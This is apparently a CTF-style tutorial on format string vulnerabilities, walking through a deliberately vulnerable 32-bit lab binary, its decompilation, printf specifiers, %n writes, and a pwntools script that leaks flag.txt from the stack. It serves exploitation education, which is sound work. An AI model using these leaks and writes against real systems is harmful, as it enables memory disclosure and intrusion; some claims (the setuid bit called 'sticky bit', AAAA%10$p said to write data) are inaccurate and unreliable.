description |
---|
08/26/2023 |
What will we be learning?
We will be learning how to identify and utilize format string vulnerabilities in programs to be able to leak addresses and other data off the stack.
{% embed url="https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" %}
{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/07-format_string_vulns" %} Grab the target binary here and other files {% endembed %}
{% file src="../.gitbook/assets/Format_String.pdf" %}
{% embed url="https://www.youtube.com/watch?v=iwNYoDw1hW4" %} The all mighty CryptoCat {% endembed %}
sudo chown root:root format_vuln
sudo chmod 4655 format_vuln -- This will set the "sticky bit"
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
file
:
{% code overflow="wrap" %}
format_vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=c6e50d7e3fe3796407a1827f21d01f343dbaf3fa, for GNU/Linux 3.2.0, not stripped
{% endcode %}
- 32-bit
- Dynamically linked to
libc
library - Not stripped
checksec
:
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
- NX Enabled
Something that you want to get into the habit of, is simply just running the binary and asking yourself "what is the program doing? What is the point of the program? What conditions is it requiring?"
These types of questions will help you gain a serious level of situational awareness and allow you to better process what is happening on the stack while looking at assembly, when looking at decompilation, etc.
Okay, we can see that we are likely using printf()
to be able to print out our STDIN.
Also, notice how we cannot overflow the buffer, is fgets()
being used to check against the size of the buffer?
It also appears that we are in some type of loop.
I know that the video highlights source code analysis, but often we find ourselves in the situation more times than not with just the binary alone and no source code.
Load up the binary in Ghidra.
Decompilation of main() variables and conversions have been made
:
void main(void)
{
char buffer_1 [64];
char buffer_2 [64];
FILE *local_1c;
__gid_t local_18;
char *local_14;
undefined *puStack_10;
puStack_10 = &stack0x00000004;
setvbuf(_stdout,(char *)0x0,2,0);
local_14 = buffer_1;
local_18 = getegid();
setresgid(local_18,local_18,local_18);
puts("We will evaluate any format string you give us with printf().");
local_1c = fopen("flag.txt","r");
if (local_1c == (FILE *)0x0) {
puts("flag.txt is missing!");
/* WARNING: Subroutine does not return */
exit(0);
}
fgets(buffer_1,64,local_1c);
do {
printf("> ");
fgets(buffer_2,64,_stdin);
printf(buffer_2);
} while( true );
}
Convert the original 0x40
in fgets()
to decimal and you will see that it is taking the sizeof()
our buffer (which is of 64-bytes). It will be converted to hex 0x40
to 64
decimal.
Renamed variables pertaining to buffers to be easier to read:
- Both buffers are of 64-bytes
- We see a variable that is being pointed to something (*)
fopen()
is pointing to a file descriptor and the string is flag.txt. It is then using the "r
" argument to read from the file.- Here, we aren't using
gets()
, but ratherfgets()
which is not a dangerous function because it is only going to read the flag size of 64-bytes - We will then use
printf()
to display ">
" to act as a console fgets()
will then utilize_stdin
to take in our STDIN/input- We then see that
fgets()
is taking thesizeof()
our buffer of 64-bytes. There is no vulnerability here because it is checking STDIN is of 64-bytes. - Lastly, we see
printf(buffer_2)
which is where our vulnerability can be found - Also, I felt it was important to mention that we will be looping while true, giving us an infinite loop, never-ending program
The second printf()
call is where the vulnerability lies
The vulnerability lies in the printf()
call itself.
You might be asking yourself, well there is no format specifier argument being used in the first printf()
call, and you'd be right. So why is that not vulnerable? It is because our second printf() is taking user-input from STDIN from fgets()
and placing it in buffer_2
. Since STDIN is being used in the second printf()
without a format specifier, this means that we fully control the format specifier.
Anytime that you take input from the user, you MUST specify which type of data you are expecting it to be.
This must be supplied to printf()
as an argument, or it will result in a Format String Vulnerability.
In other words, if the developer does NOT specify a format specifier, the attacker can supply one for the printf()
call.
Check out this diagram to view what format specifiers look like in C:
Format Specifier | Type |
---|---|
%c | Character |
%d | Signed integer |
%e or %E | Scientific notation of floats |
%f | Float values |
%g or %G | Similar as %e or %E |
%hi | Signed integer (short) |
%hu | Unsigned Integer (short) |
%i | Unsigned integer |
%l or %ld or %li | Long |
%lf | Double |
%Lf | Long double |
%lu | Unsigned int or unsigned long |
%lli or %lld | Long long |
%llu | Unsigned long long |
%o | Octal representation |
%p | Pointer |
%s | String |
%u | Unsigned int |
%x or %X | Hexadecimal representation |
%n | Prints nothing |
%% | Prints % character |
{% embed url="https://vickieli.dev/binary%20exploitation/format-string-vulnerabilities/" %} This guide is OP {% endembed %}
Keep in mind that we can literally print anything from the stack and even data not located on the stack with this vulnerability.
This includes:
- Global Offset Table (GOT)
- Anything else
So, with the Format String Vulnerability identified, since the attacker can supply their own format specifier, let's do so:
- We sent
%p
and was able to return pointers. - We sent
%x
and was able to return hex values. - We sent
%c
and was able to return char values.
If we tried to simply print out the values as a string using a string format specifier, we would segmentation fault.
Why is that?
This is because it will try to print the value as a pointer which will lead to an address that is not within the program's memory range, leading to a program crash and segmentation fault.
This can also be explained as %s
treating the data on the stack as an address to go grab the string from. This is also known as pass by reference.
This means that we could even read from any address, even if the data is not located on the stack.
This is all stemming from the fact that we fully control the format string.
What is the data in these values?
We can use unhex
to convert these values because they are all hex values!
unhex 67616c66
galf
Interesting, that's flag backwards. It's represented this way due to little-endian.
I wonder if we can find our flag in memory by leaking values from the stack 🤔.
A typo led me to discover that we can use %m
to display the error message to the current value of the function:
Result
Explanation
Notice how 67616c66
is our fifth element that was printed.
If we use printf()
's positional arguments, we can print that exact value:
%5$x
67616c66
%5$x
0x67616c66
Interesting. Let's see if we can print out the entire flag from this leak.
In printf()
, we can use %n
to cause the number of characters written so far to be stored in the function argument.
Remember, we FULLY control the format string.
This means that we can write arbitrary integers to the location pointed to by a function argument.
For example, the following code will store the integer 5 into the variable num_char.
int num_char;
printf("11111%n", &num_char);
You can also pass an arbitrary value to printf()
as a value. This allows you to be able to take a format string vulnerability to be able to write data using %n.
You can write arbitrary data using this method:
AAAA%10$p
This will write 4 A's to our address.
{% embed url="https://docs.pwntools.com/en/stable/fmtstr.html" %}
fuzz.py:
from pwn import *
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./format_vuln', checksec=False)
# Let's fuzz 100 values
for i in range(100):
try:
# Create process (level used to reduce noise)
p = process(level='error')
# When we see the user prompt '>', format the counter
# e.g. %2$s will attempt to print second pointer as string
p.sendlineafter(b'> ', '%{}$s'.format(i).encode())
# Receive the response
result = p.recvuntil(b'> ')
# Check for flag
# if("flag" in str(result).lower()):
print(str(i) + ': ' + str(result))
# Exit the process
p.close()
except EOFError:
pass
Result:
We are able to see the contents of flag.txt in the 39th element
Be sure to print as pointers rather than hex so that you get the full value!!!
If an address is pointing to a libc function, we can subtract the function to get back to the base and be able to perform ret2libc!